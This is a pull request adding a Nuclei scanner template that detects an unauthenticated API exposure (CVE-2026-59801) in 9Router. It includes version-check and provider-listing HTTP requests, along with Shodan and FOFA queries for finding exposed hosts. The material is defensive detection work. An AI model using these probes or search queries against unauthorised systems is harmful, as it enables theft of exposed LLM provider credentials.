### PR TITLE
Add CVE-2026-59801.yaml - 9Router - Unauthenticated LLM Provider API Exposure

### DIFF
--- a/http/cves/2026/CVE-2026-59801.yaml
+++ b/http/cves/2026/CVE-2026-59801.yaml
@@ -1,0 +1,61 @@
+id: CVE-2026-59801
+
+info:
+  name: 9Router - Unauthenticated LLM Provider API Exposure
+  author: 0x_Akoko
+  severity: critical
+  description: |
+   9Router through version 0.4.41 contains an unauthenticated access vulnerability caused by missing authentication middleware in Next.js API routes under src/app/api/providers/*, letting remote attackers enumerate, create, modify, or delete provider connections, exploit requires no authentication.
+  impact: |
+   Remote attackers can expose credentials, redirect traffic, or cause denial of service by deleting provider connections.
+  remediation: |
+   Update to the latest version that includes authentication middleware for API routes.
+  reference:
+    - https://github.com/decolua/9router/security/advisories/GHSA-vjc7-jrh9-9j86
+    - https://nvd.nist.gov/vuln/detail/CVE-2026-59801
+  metadata:
+    verified: true
+    max-request: 2
+    product: 9router
+    vendor: decolua
+    shodan-query: port:20128 http.html:"9Router"
+    fofa-query: port="20128" || title="9Router"
+  tags: 9router,unauth,api-exposure,misconfig,api-key-leak
+
+flow: http(1) && http(2)
+
+http:
+  - raw:
+      - |
+        GET /api/version HTTP/1.1
+        Host: {{Hostname}}
+
+    matchers:
+      - type: dsl
+        dsl:
+          - 'status_code == 200'
+          - 'contains(body, "currentVersion")'
+          - 'compare_versions(lsversion, ">=0.0.1", "<=0.4.41")'
+        condition: and
+        internal: true
+
+    extractors:
+      - type: regex
+        name: lsversion
+        internal: true
+        group: 1
+        regex:
+          - '"currentVersion"\s*:\s*"([^"]+)"'
+
+  - raw:
+      - |
+        GET /api/providers HTTP/1.1
+        Host: {{Hostname}}
+
+    matchers:
+      - type: dsl
+        dsl:
+          - 'status_code == 200'
+          - 'contains(content_type, "application/json")'
+          - 'contains_all(body, "authType", "provider", "connections")'
+        condition: and


### PR DESCRIPTION
CVE-2026-59801 details an unauthenticated access vulnerability in 9Router, allowing remote attackers to manipulate provider connections. It includes remediation steps and references for further information.

### PR Information

<!-- Explains the information and/or motivation for update or/ creating this templates -->
<!-- Please include any reference to your template if available -->

- Fixed CVE-2020-XXX / Added CVE-2020-XXX / Updated CVE-2020-XXX
- References:

### Template validation

<!-- Clarifies if the valdation of the template was done on an actual system for which the template was developed -->
<!-- If this concerns a vulnerability check, please clarify if validation was done on a known vulnerable system and optionally on a known not vulnerable system to avoid false positives -->

- [x] Validated with a host running a vulnerable version and/or configuration (True Positive)
- [ ] Validated with a host running a patched version and/or configuration (avoid False Positive)

#### Additional Details (leave it blank if not applicable)

<!-- Include `nuclei -debug` output along with Shodan / Fofa / Google Query / Docker or screenshots if available -->
<!-- Please do NOT include vulnerable host information in pull requests -->
<!-- None of the prerequisites are obligatory; they are merely intended to speed the review process. -->

### Additional References:

- [Nuclei Template Creation Guideline](https://docs.projectdiscovery.io/templates/introduction)
- [Nuclei Template Matcher Guideline](https://github.com/projectdiscovery/nuclei-templates/wiki/Unique-Template-Matchers)
- [Nuclei Template Contribution Guideline](https://github.com/projectdiscovery/nuclei-templates/blob/master/CONTRIBUTING.md)
- [PD-Community Discord server](https://discord.gg/projectdiscovery)
